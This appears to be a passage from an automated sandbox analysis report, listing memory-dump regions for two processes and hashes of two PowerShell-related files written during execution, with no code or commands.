memory/3268-200-0x00000000073B0000-0x00000000079D8000-memory.dmp
memory/3268-201-0x0000000009230000-0x0000000009263000-memory.dmp
memory/3268-202-0x0000000009230000-0x0000000009263000-memory.dmp
memory/3268-203-0x00000000071E0000-0x0000000007202000-memory.dmp
memory/3268-204-0x0000000007BC0000-0x0000000007C26000-memory.dmp
memory/3268-205-0x0000000007AE0000-0x0000000007B46000-memory.dmp
memory/3268-206-0x0000000008570000-0x00000000085BB000-memory.dmp
memory/3268-207-0x0000000008370000-0x00000000083E6000-memory.dmp
memory/3268-208-0x0000000009210000-0x000000000922E000-memory.dmp
memory/3268-213-0x0000000009590000-0x0000000009635000-memory.dmp
memory/3268-214-0x0000000009730000-0x00000000097C4000-memory.dmp
memory/3268-215-0x000000007E580000-0x000000007E581000-memory.dmp
memory/3268-216-0x0000000006D73000-0x0000000006D74000-memory.dmp
memory/3268-409-0x00000000096E0000-0x00000000096FA000-memory.dmp
memory/3268-414-0x00000000096E0000-0x00000000096FA000-memory.dmp
memory/3268-415-0x00000000096D0000-0x00000000096D8000-memory.dmp
memory/3268-420-0x00000000096D0000-0x00000000096D8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/2608-433-0x0000000004F10000-0x0000000004F46000-memory.dmp
memory/2608-434-0x0000000007AC0000-0x00000000080E8000-memory.dmp
memory/2608-435-0x0000000007970000-0x0000000007992000-memory.dmp
memory/2608-436-0x0000000007A10000-0x0000000007A76000-memory.dmp
memory/2608-437-0x00000000083A0000-0x0000000008406000-memory.dmp
memory/2608-438-0x0000000008410000-0x0000000008760000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5d8bf6eced4d0a80279646c6a37b9a4f |
| SHA1 | 1481dccc6b3a854d4e47bbac5b47192c4aa1f7e4 |
| SHA256 | cc60d80176eb96fc3f40b32201c4359942ccf293ba514832f4634dbd42d64c1c |
| SHA512 | 0a07227bd5705d99e6b48fe5e71dac9abdc5c72e831cebf6493fcb9a88b91422d3814f9ac45fddb60a2c70c26f24428a956cb7cddd25eaa0b5fc8c7c454afbc4 |
memory/2608-441-0x0000000007482000-0x0000000007483000-memory.dmp
memory/2608-440-0x0000000007480000-0x0000000007481000-memory.dmp
memory/2608-442-0x0000000008780000-0x000000000879C000-memory.dmp
memory/2608-443-0x0000000008D40000-0x0000000008D8B000-memory.dmp
memory/2608-444-0x0000000008A20000-0x0000000008A96000-memory.dmp
memory/2608-453-0x0000000007AC0000-0x00000000080E8000-memory.dmp
memory/2608-454-0x0000000009960000-0x0000000009993000-memory.dmp
memory/2608-455-0x0000000009960000-0x0000000009993000-memory.dmp
memory/2608-456-0x0000000007970000-0x0000000007992000-memory.dmp
memory/2608-457-0x0000000007A10000-0x0000000007A76000-memory.dmp
memory/2608-458-0x000000007F010000-0x000000007F011000-memory.dmp
memory/2608-460-0x0000000008D40000-0x0000000008D8B000-memory.dmp
memory/2608-459-0x00000000083A0000-0x0000000008406000-memory.dmp
memory/2608-461-0x0000000008A20000-0x0000000008A96000-memory.dmp
memory/2608-462-0x00000000098D0000-0x00000000098EE000-memory.dmp
memory/2608-467-0x0000000009D30000-0x0000000009DD5000-memory.dmp
memory/2608-468-0x0000000009DE0000-0x0000000009E74000-memory.dmp
memory/2608-537-0x0000000007483000-0x0000000007484000-memory.dmp
memory/2608-662-0x0000000009EE0000-0x0000000009EFA000-memory.dmp
memory/2608-667-0x0000000009EE0000-0x0000000009EFA000-memory.dmp
memory/2608-668-0x0000000009EC0000-0x0000000009EC8000-memory.dmp
memory/2608-673-0x0000000009EC0000-0x0000000009EC8000-memory.dmp